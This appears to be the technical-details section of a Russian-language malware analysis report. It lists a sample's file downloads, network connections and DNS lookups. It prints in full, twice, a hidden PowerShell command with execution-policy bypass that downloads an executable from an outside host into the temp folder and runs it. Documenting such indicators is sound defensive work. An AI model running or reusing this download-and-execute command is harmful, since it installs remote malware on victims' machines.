Техническая информация
- http://iatacass.com/optal/tarastic.exe как %temp%\\snidhst.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://iatacass.com/optal/tarastic.exe','%TEMP%\\snidhst.exe') & %TEMP%\\snidhst.exe
- 'ia###ass.com':80
- 'hu###omains.com':443
- http://ia###ass.com/optal/tarastic.exe
- 'hu###omains.com':443
- DNS ASK ia###ass.com
- DNS ASK hu###omains.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://iatacass.com/optal/tarastic.exe','%TEMP%\\snidhst.exe') & %TEMP%\\snidhst.exe' (со скрытым окном)